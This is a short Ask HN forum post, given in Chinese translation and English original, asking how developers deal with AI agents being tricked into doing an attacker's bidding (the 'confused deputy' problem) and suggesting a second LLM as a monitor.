HackerNews中文版

一个智能体的价值与其被授予的权限成正比。围绕诸如默认拒绝代理、密钥库等解决方案，一直存在很多炒作，但似乎没有任何东西能解决核心矛盾：智能体可能被欺骗，从而听从攻击者的指令。我能想到的最好的办法是运行一个观察者循环，用另一个大语言模型来监控智能体所做的一切，但我很好奇是否有人有更优雅的解决方案。

查看原文

An agent's value is proportional to the permissions it's been granted.<p>There's been a lot of hype around solutions like default denial proxies, key vaults, and more, but nothing seems to address the core tension: an agent can be tricked into doing an attacker's bidding.<p>The best thing I could think of was to just run an observer loop and monitor everything the agent does with another LLM, but I'm curious if anyone has an elegant solution.

提问 HN：你们如何解决 AI 的“糊涂副手”问题？